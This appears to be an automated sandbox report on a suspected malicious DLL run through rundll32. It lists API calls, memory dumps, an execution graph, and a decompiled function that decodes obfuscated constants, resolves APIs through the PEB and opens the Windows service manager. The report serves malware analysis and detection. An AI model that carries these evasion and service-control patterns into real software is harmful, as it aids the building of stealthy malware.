                                                                                                                          APIs
                                                                                                                          • EnableWindow.USER32(000000FF,00000001), ref: 100174ED
                                                                                                                          • GetActiveWindow.USER32 ref: 100174F8
                                                                                                                          • SetActiveWindow.USER32(000000FF), ref: 10017506
                                                                                                                          • FreeResource.KERNEL32(00000008,?,00000024,100010EC,00000000,10046640), ref: 10017522
                                                                                                                            • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$ActiveEnable$FreeResource
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 253586258-0
                                                                                                                          • Opcode ID: eb27006848965884004c9991400e475c3ac81a8aa5cc97471f58b07f94fae74b
                                                                                                                          • Instruction ID: b8177a2bef97c6db83ac0ed626da55a545c9139c8ac7342270f03f66935dd0b6
                                                                                                                          • Opcode Fuzzy Hash: eb27006848965884004c9991400e475c3ac81a8aa5cc97471f58b07f94fae74b
                                                                                                                          • Instruction Fuzzy Hash: C5F03C34900A15CFDF12EB64CD8559DBBF2FF88702B100115E446BA161DB72AD80CE16
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 1002E228
                                                                                                                          • GetTickCount.KERNEL32 ref: 1002E235
                                                                                                                          • CoFreeUnusedLibraries.OLE32 ref: 1002E244
                                                                                                                          • GetTickCount.KERNEL32 ref: 1002E24A
                                                                                                                            • Part of subcall function 1002E1AF: CoFreeUnusedLibraries.OLE32 ref: 1002E1F3
                                                                                                                            • Part of subcall function 1002E1AF: OleUninitialize.OLE32 ref: 1002E1F9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CountTick$FreeLibrariesUnused$Uninitialize
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 685759847-0
                                                                                                                          • Opcode ID: 5645409a338d605000a15fbb944d62efc2c9a6456e8d0e25dbd15ca34f7d067c
                                                                                                                          • Instruction ID: b81a2157dff59843e5c721b5fa459b83a8bef19e296eb3c7ce89af4ff474d23a
                                                                                                                          • Opcode Fuzzy Hash: 5645409a338d605000a15fbb944d62efc2c9a6456e8d0e25dbd15ca34f7d067c
                                                                                                                          • Instruction Fuzzy Hash: 3BE012358D42B4CBFB04FB20ED883A93BE8FB46305F514527D04692165DB346C59DF52
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ClearVariant
                                                                                                                          • String ID: (
                                                                                                                          • API String ID: 1473721057-3887548279
                                                                                                                          • Opcode ID: 008ec943e52341c0dca71a05145884f93f6144af570bd047c2597266c283ece8
                                                                                                                          • Instruction ID: 55505e3d54abccaab23e3fb35bc0536c28338c561f08ce7921e5662988eb51c3
                                                                                                                          • Opcode Fuzzy Hash: 008ec943e52341c0dca71a05145884f93f6144af570bd047c2597266c283ece8
                                                                                                                          • Instruction Fuzzy Hash: 52517A75600B11DFCB64CF68D9C2A2AB7F5FF48314B904A6DE5868BA52C770F981CB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: H_prolog3
                                                                                                                          • String ID: @
                                                                                                                          • API String ID: 431132790-2766056989
                                                                                                                          • Opcode ID: 154d677d06bdea17fd7c180cae35ab477e1537548e58b8b808fb5212b96a33b2
                                                                                                                          • Instruction ID: 3c539a28780873688809e1a5131d88fd7e7c20f84f620333ebd6e4501b894ad0
                                                                                                                          • Opcode Fuzzy Hash: 154d677d06bdea17fd7c180cae35ab477e1537548e58b8b808fb5212b96a33b2
                                                                                                                          • Instruction Fuzzy Hash: 2951D5B0A0020A9FDB04CFA8C8D8AEEB7F9FF48305F50456AE516EB251E775A945CF50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 100150B5
                                                                                                                          • PathFindExtensionA.SHLWAPI(?), ref: 100150CB
                                                                                                                            • Part of subcall function 10014B27: _strcpy_s.LIBCMT ref: 10014B33
                                                                                                                            • Part of subcall function 10014DA8: __EH_prolog3.LIBCMT ref: 10014DC7
                                                                                                                            • Part of subcall function 10014DA8: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10014DE8
                                                                                                                            • Part of subcall function 10014DA8: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10014DF9
                                                                                                                            • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E2F
                                                                                                                            • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E37
                                                                                                                            • Part of subcall function 10014DA8: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10014E4B
                                                                                                                            • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E6F
                                                                                                                            • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(000003FF), ref: 10014E75
                                                                                                                            • Part of subcall function 10014DA8: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10014EAE
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
                                                                                                                          • String ID: %s.dll
                                                                                                                          • API String ID: 3444012488-3668843792
                                                                                                                          • Opcode ID: 658e8660b57156c47c50295d269887a352ab673736f5c816275cebcb6cd6bc48
                                                                                                                          • Instruction ID: 0816ccb3c2c5dc3d5c2f43fd153125c4ae2bbce82e663fde520804fb1fdab18a
                                                                                                                          • Opcode Fuzzy Hash: 658e8660b57156c47c50295d269887a352ab673736f5c816275cebcb6cd6bc48
                                                                                                                          • Instruction Fuzzy Hash: 9901B971A10118BBDF09DB74DD96AEEB3B8DF04B01F0105E9EA02DB140EEB1EE448A61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • IsBadReadPtr.KERNEL32(00000000,00000014,?,?,?,?,100025CE,00000000,00000000), ref: 10002045
                                                                                                                          • SetLastError.KERNEL32(0000007E), ref: 10002087
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLastRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4100373531-0
                                                                                                                          • Opcode ID: b6f425d35b460735779e1ed3fb281948f59bf2ef0f2add24d18ae520f481b1e4
                                                                                                                          • Instruction ID: bdea880ba7c0c5bd5d2dbe714977ff7d927dc75702b615567210b407e242d671
                                                                                                                          • Opcode Fuzzy Hash: b6f425d35b460735779e1ed3fb281948f59bf2ef0f2add24d18ae520f481b1e4
                                                                                                                          • Instruction Fuzzy Hash: B181A8B4A00209EFDB04CF94C980AAEB7B1FF48354F248159E919AB355D735EE82CF94
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 10020B95
                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?), ref: 10020BA5
                                                                                                                          • LocalFree.KERNEL32(?), ref: 10020BAE
                                                                                                                          • TlsSetValue.KERNEL32(?,00000000), ref: 10020BC0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2949335588-0
                                                                                                                          • Opcode ID: 6676c0264c2eb297a537204f12f4d5c162c59b7e83937d8b07f604b269a52a54
                                                                                                                          • Instruction ID: af4df8c6ab00e3b134578f48d56f113cbd39bdf93991f651abc1e22c3acb8acd
                                                                                                                          • Opcode Fuzzy Hash: 6676c0264c2eb297a537204f12f4d5c162c59b7e83937d8b07f604b269a52a54
                                                                                                                          • Instruction Fuzzy Hash: 70113435600305EFE721CF54D9C4B9AB7AAFF0A35AF508429F5528B5A2DB71F980CB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • EnterCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020E99
                                                                                                                          • InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EA8
                                                                                                                          • LeaveCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EB5
                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EC1
                                                                                                                            • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$Enter$Exception@8InitializeLeaveThrow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3253506028-0
                                                                                                                          • Opcode ID: cf9bd6703211ded15ebc294ea5b4eaffa7e14a09b8c66129e44fb6711d6d5733
                                                                                                                          • Instruction ID: 3404b174272e1aedd22e2de365cf3e448d28d784c73140ac4aa41e98356ae93e
                                                                                                                          • Opcode Fuzzy Hash: cf9bd6703211ded15ebc294ea5b4eaffa7e14a09b8c66129e44fb6711d6d5733
                                                                                                                          • Instruction Fuzzy Hash: 5AF0907350031A9BDB10DB58FC88B1AB6AAFB96355F870816F64582123EB3264C48A61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • EnterCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 100206D1
                                                                                                                          • TlsGetValue.KERNEL32 ref: 100206E6
                                                                                                                          • LeaveCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 100206FC
                                                                                                                          • LeaveCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 10020707
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$Leave$EnterValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3969253408-0
                                                                                                                          • Opcode ID: 384891d58c6dafcceaf36b456d2d2389f12afbb41143d91066085e81aa889ef7
                                                                                                                          • Instruction ID: 186a6cd651b3b82d4df79f5272d157dd9dcdda25cd8a7682fbe975f35e4e1d68
                                                                                                                          • Opcode Fuzzy Hash: 384891d58c6dafcceaf36b456d2d2389f12afbb41143d91066085e81aa889ef7
                                                                                                                          • Instruction Fuzzy Hash: 51F0FE76604720DFD320CF64DD8880B73ABEB8925135A9555F842D3123E630F8058F61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:15.7%
                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                          Signature Coverage:0%
                                                                                                                          Total number of Nodes:1080
                                                                                                                          Total number of Limit Nodes:17
23aa30 GetPEB 4970->4971 4972 221a3f 4971->4972 4972->4953 4974 227f8e 4973->4974 4975 23aa30 GetPEB 4974->4975 4976 227fd4 CreateProcessW 4975->4976 4976->4964 4978 23bb48 4977->4978 4979 231e67 2 API calls 4978->4979 4982 23be1d 4978->4982 4983 223de2 GetPEB 4978->4983 4997 240ac8 4978->4997 5001 23d8ec 4978->5001 4979->4978 4982->4873 4983->4978 4985 23aa30 GetPEB 4984->4985 4986 223e36 4985->4986 4986->4873 4995 23d3c3 4987->4995 4989 23d82d 5013 239008 4989->5013 4991 23d82b 4991->4873 4992 224b61 GetPEB 4992->4995 4993 23dcf7 2 API calls 4993->4995 4995->4989 4995->4991 4995->4992 4995->4993 4996 22a8b0 GetPEB 4995->4996 5005 23de10 4995->5005 5009 224241 4995->5009 4996->4995 4998 240af2 4997->4998 4999 23aa30 GetPEB 4998->4999 5000 240b4e 4999->5000 5000->4978 5002 23d8ff 5001->5002 5003 23aa30 GetPEB 5002->5003 5004 23d96e 5003->5004 5004->4978 5006 23de56 5005->5006 5007 23aa30 GetPEB 5006->5007 5008 23deba 5007->5008 5008->4995 5010 224257 5009->5010 5011 23aa30 GetPEB 5010->5011 5012 2242b3 5011->5012 5012->4995 5014 23901a 5013->5014 5015 23aa30 GetPEB 5014->5015 5016 239074 5015->5016 5016->4991 5018 23aa30 GetPEB 5017->5018 5019 237d3e 5018->5019 5019->4878 5025 23df09 5020->5025 5021 23e1a5 5023 240e3a GetPEB 5021->5023 5022 23e1a3 5022->4878 5023->5022 5024 227ff2 2 API calls 5024->5025 5025->5021 5025->5022 5025->5024 5027 238758 5026->5027 5028 23aa30 GetPEB 5027->5028 5029 2387b7 5028->5029 5029->4878 5031 2246e5 5030->5031 5032 23aa30 GetPEB 5031->5032 5033 224737 5032->5033 5033->4910 5035 23c3bc 5034->5035 5036 23c627 5035->5036 5047 22a3a3 5035->5047 5036->4910 5039 22ed7e GetPEB 5040 23c5e2 5039->5040 5040->5036 5041 22ed7e GetPEB 5040->5041 5041->5040 5043 227c52 5042->5043 5044 23cadf GetPEB 5043->5044 5045 227df1 5043->5045 5051 226ca0 5043->5051 5044->5043 5045->4910 5048 22a3c0 5047->5048 5049 23aa30 GetPEB 5048->5049 5050 22a41a 5049->5050 5050->5036 5050->5039 5052 226cb8 5051->5052 5053 23aa30 GetPEB 5052->5053 5054 226d15 
5053->5054 5054->5043 5056 23aa30 GetPEB 5055->5056 5057 22f8f4 5056->5057 5057->4182 5059 22a9e6 5058->5059 5060 23aa30 GetPEB 5059->5060 5061 22aa3f 5060->5061 5061->4182 5063 228ee7 5062->5063 5064 23aa30 GetPEB 5063->5064 5065 228f54 5064->5065 5065->4182 5067 22435e 5066->5067 5068 227ff2 2 API calls 5067->5068 5069 22ae64 GetPEB 5067->5069 5070 22457c 5067->5070 5071 2245a6 5067->5071 5068->5067 5069->5067 5077 22ae64 5070->5077 5071->4182 5074 224e8f 5073->5074 5075 23aa30 GetPEB 5074->5075 5076 224ed7 5075->5076 5076->4182 5078 22ae8b 5077->5078 5079 23aa30 GetPEB 5078->5079 5080 22aee2 5079->5080 5080->5071 5083 23001b 5081->5083 5082 238606 2 API calls 5082->5083 5083->5082 5086 23031b 5083->5086 5088 22a8b0 GetPEB 5083->5088 5089 22cd29 5083->5089 5093 22ee81 5083->5093 5098 222206 5083->5098 5086->4186 5088->5083 5090 22cd3f 5089->5090 5091 23aa30 GetPEB 5090->5091 5092 22cd9f 5091->5092 5092->5083 5102 238f15 5093->5102 5097 22eff7 5097->5083 5099 22222a 5098->5099 5100 22a42d GetPEB 5099->5100 5101 222249 5100->5101 5101->5083 5103 238f34 5102->5103 5104 23aa30 GetPEB 5103->5104 5105 22efa8 5104->5105 5105->5097 5106 23db43 5105->5106 5107 23db6c 5106->5107 5108 23aa30 GetPEB 5107->5108 5109 23dbd4 5108->5109 5109->5097 5111 227b13 5110->5111 5112 23aa30 GetPEB 5111->5112 5113 227b7c 5112->5113 5113->4196 5115 238b6f 5114->5115 5116 23aa30 GetPEB 5115->5116 5117 238bd5 5116->5117 5117->4006 5119 229df5 5118->5119 5121 22a305 5119->5121 5124 23dcf7 RtlAllocateHeap GetPEB 5119->5124 5125 22a918 GetPEB 5119->5125 5126 2247ce GetPEB 5119->5126 5127 22a8b0 GetPEB 5119->5127 5128 229dcf 2 API calls 5119->5128 5129 224635 5119->5129 5133 227e00 5119->5133 5137 228abf 5119->5137 5121->4217 5124->5119 5125->5119 5126->5119 5127->5119 5128->5119 5130 22464b 5129->5130 5131 23aa30 GetPEB 5130->5131 5132 2246b0 5131->5132 5132->5119 5134 227e18 5133->5134 5135 23aa30 GetPEB 5134->5135 5136 227e79 5135->5136 5136->5119 5138 228ad1 5137->5138 5139 23aa30 GetPEB 
5138->5139 5140 228b32 5139->5140 5140->5119 5152 22e2cc 5141->5152 5145 229ba6 5144->5145 5175 2291dd 5145->5175 5148 229d26 5148->4226 5151 231e67 2 API calls 5151->5148 5156 22e2f1 5152->5156 5157 22e4ef 5156->5157 5159 225357 5156->5159 5161 225988 5156->5161 5164 228e4d 5156->5164 5167 23c15d 5156->5167 5171 222a58 5156->5171 5160 231e67 2 API calls 5157->5160 5159->4226 5160->5159 5162 23aa30 GetPEB 5161->5162 5163 2259db 5162->5163 5163->5156 5165 235c73 GetPEB 5164->5165 5166 228eb3 5165->5166 5166->5156 5168 23c176 5167->5168 5169 23aa30 GetPEB 5168->5169 5170 23c1de 5169->5170 5170->5156 5172 222a71 5171->5172 5173 23aa30 GetPEB 5172->5173 5174 222ad6 5173->5174 5174->5156 5176 23aa30 GetPEB 5175->5176 5177 22923b 5176->5177 5177->5148 5178 2276aa 5177->5178 5179 2276cd 5178->5179 5180 23aa30 GetPEB 5179->5180 5181 227723 5180->5181 5181->5151 5183 23e365 5182->5183 5184 22a42d GetPEB 5183->5184 5185 23e38d 5184->5185 5185->4229 5188 22410d 5186->5188 5189 22421e 5188->5189 5190 23dcf7 2 API calls 5188->5190 5192 22421c 5188->5192 5193 22aad6 GetPEB 5188->5193 5194 22a8b0 GetPEB 5188->5194 5206 221f53 5188->5206 5191 221fd1 GetPEB 5189->5191 5190->5188 5191->5192 5192->4258 5193->5188 5194->5188 5196 236c65 5195->5196 5197 224b61 GetPEB 5196->5197 5198 236d92 5196->5198 5201 236db0 5196->5201 5214 229d31 5196->5214 5197->5196 5210 236637 5198->5210 5201->4258 5203 22b1db 5202->5203 5204 23aa30 GetPEB 5203->5204 5205 22b231 5204->5205 5205->4252 5207 221f6f 5206->5207 5208 23aa30 GetPEB 5207->5208 5209 221fc3 5208->5209 5209->5188 5211 236659 5210->5211 5212 23aa30 GetPEB 5211->5212 5213 2366b7 5212->5213 5213->5201 5215 229d52 5214->5215 5216 23aa30 GetPEB 5215->5216 5217 229dc1 5216->5217 5217->5196 5218 22e991 5219 22ea62 5218->5219 5223 22ea8d 5218->5223 5224 22f8fd 5219->5224 5222 2293ed 2 API calls 5222->5223 5235 22fde0 5224->5235 5225 22ffd1 5227 22ab87 3 API calls 5225->5227 5226 224b61 GetPEB 5226->5235 5228 22ea75 5227->5228 5228->5222 
5228->5223 5229 22f899 GetPEB 5229->5235 5230 2346bb 2 API calls 5230->5235 5231 23da22 GetPEB 5231->5235 5233 23dcf7 RtlAllocateHeap GetPEB 5233->5235 5234 22a8b0 GetPEB 5234->5235 5235->5225 5235->5226 5235->5228 5235->5229 5235->5230 5235->5231 5235->5233 5235->5234 5236 2247ce GetPEB 5235->5236 5237 22b23c 5235->5237 5236->5235 5238 22b254 5237->5238 5239 23aa30 GetPEB 5238->5239 5240 22b2b8 lstrcmpiW 5239->5240 5240->5235 5254 2281b7 5264 228679 5254->5264 5255 238519 GetPEB 5255->5264 5257 228f65 2 API calls 5257->5264 5258 23da22 GetPEB 5258->5264 5259 227ff2 2 API calls 5259->5264 5260 2286e2 5261 22b6cf GetPEB 5261->5264 5262 2286c6 5266 231e67 2 API calls 5262->5266 5263 22b23c 2 API calls 5263->5264 5264->5255 5264->5257 5264->5258 5264->5259 5264->5260 5264->5261 5264->5262 5264->5263 5267 23c264 5264->5267 5271 23458f 5264->5271 5266->5260 5268 23c291 5267->5268 5269 23aa30 GetPEB 5268->5269 5270 23c2dd 5269->5270 5270->5264 5272 2345a2 5271->5272 5273 23aa30 GetPEB 5272->5273 5274 234619 5273->5274 5274->5264 5279 230a96 5281 230aa6 5279->5281 5282 234087 GetPEB 5279->5282 5282->5281 5283 224c5d 5284 224d8d 5283->5284 5285 238606 2 API calls 5284->5285 5290 224dd2 5284->5290 5286 224da8 5285->5286 5291 22cbdf 5286->5291 5289 22a8b0 GetPEB 5289->5290 5292 22cbfb 5291->5292 5293 224dbc 5292->5293 5295 234011 5292->5295 5293->5289 5296 234026 5295->5296 5297 23aa30 GetPEB 5296->5297 5298 234078 5297->5298 5298->5292

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 250 22912c-2291af call 2320b9 call 23aa30 OpenSCManagerW
                                                                                                                          C-Code - Quality: 54%
                                                                                                                          			E0022912C(int __ecx, void* __edx, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				void* _t24;
                                                                                                                          				void* _t32;
                                                                                                                          				signed int _t34;
                                                                                                                          				int _t43;
                                                                                                                          
                                                                                                                          				_push(__ecx);
                                                                                                                          				_push(__ecx);
                                                                                                                          				_push(_a20);
                                                                                                                          				_t43 = __ecx;
                                                                                                                          				_push(_a16);
                                                                                                                          				_push(0);
                                                                                                                          				_push(_a8);
                                                                                                                          				_push(0);
                                                                                                                          				_push(__ecx);
                                                                                                                          				E002320B9(_t24);
                                                                                                                          				_v12 = 0x4657ea;
                                                                                                                          				_t34 = 0x1b;
                                                                                                                          				_v12 = _v12 / _t34;
                                                                                                                          				_v12 = _v12 ^ 0x000ac4f3;
                                                                                                                          				_v8 = 0xb5c996;
                                                                                                                          				_v8 = _v8 >> 4;
                                                                                                                          				_v8 = _v8 * 0x19;
                                                                                                                          				_v8 = _v8 + 0x3329;
                                                                                                                          				_v8 = _v8 ^ 0x01161fa0;
                                                                                                                          				E0023AA30(0x14e, 0x20a9b263, _t34, 0x18e12c58);
                                                                                                                          				_t32 = OpenSCManagerW(0, 0, _t43); // executed
                                                                                                                          				return _t32;
                                                                                                                          			}








